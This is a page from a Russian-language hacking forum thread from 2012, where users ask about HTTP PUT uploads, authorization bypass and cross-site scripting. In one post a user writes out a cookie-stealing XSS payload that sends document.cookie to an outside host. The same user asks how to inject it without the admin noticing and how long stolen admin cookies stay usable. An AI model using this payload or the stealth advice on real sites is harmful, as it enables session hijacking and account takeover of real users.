HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1930 из 2438 « Первая < 9301430183018801920 1926 1927 1928 1929 1930 1931 1932 1933 1934 1940198020302430 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #19291  
Старый 15.01.2012, 14:26
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от Bahamut  
Bahamut said:
как залить файл если работает Put Method ?
Никак, если нет обработчика.
 
Ответить с цитированием

  #19292  
Старый 15.01.2012, 16:35
Bahamut
Guest
Сообщений: n/a
Провел на форуме:
2229

Репутация: 0
По умолчанию
Цитата:
Сообщение от Ereee  
Ereee said:
Никак, если нет обработчика.
а где можно про это прочитать, просто сканер говорит что залил этим методом файл
 
Ответить с цитированием

  #19293  
Старый 15.01.2012, 16:38
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от Bahamut  
Bahamut said:
а где можно про это прочитать, просто сканер говорит что залил этим методом файл
Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при:

..

Можно обойти авторизацию, отправив POST запрос.
 
Ответить с цитированием

  #19294  
Старый 15.01.2012, 19:42
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию
Цитата:
Сообщение от None  
Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.
M_script ты имеешь виду чтобы такого небыло :



Это появляется когда я в строке name пишу

img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;

, а вот source :

Name: test
Message: This is a test comment.
Name: img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;



Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.

Цитата:
Сообщение от None  
Я уже писал выше, там нужно
ript>alert()
потому что вырезает только а не трогает.
trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать ript>alert()ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> : , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?

И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )
 
Ответить с цитированием

  #19295  
Старый 15.01.2012, 22:01
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
В HTML:

[QUOTE="None"]
 
Ответить с цитированием

  #19296  
Старый 15.01.2012, 22:14
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
 
Ответить с цитированием

  #19297  
Старый 15.01.2012, 22:18
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию
Цитата:
Сообщение от NZT  
NZT said:
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?
Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.
 
Ответить с цитированием

  #19298  
Старый 15.01.2012, 22:18
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.
 
Ответить с цитированием

  #19299  
Старый 15.01.2012, 23:58
NZT
Guest
Сообщений: n/a
Провел на форуме:
6075

Репутация: 0
По умолчанию
Понял. Большое спасибо за ответы.
 
Ответить с цитированием

  #19300  
Старый 16.01.2012, 15:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
права в папке есть, на правку, залив

но почему-то ничего не льется и не редактируется

сервер виндосовский

2ereee, это уже другой
 
Ответить с цитированием
Ответ
Страница 1930 из 2438 « Первая < 9301430183018801920 1926 1927 1928 1929 1930 1931 1932 1933 1934 1940198020302430 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ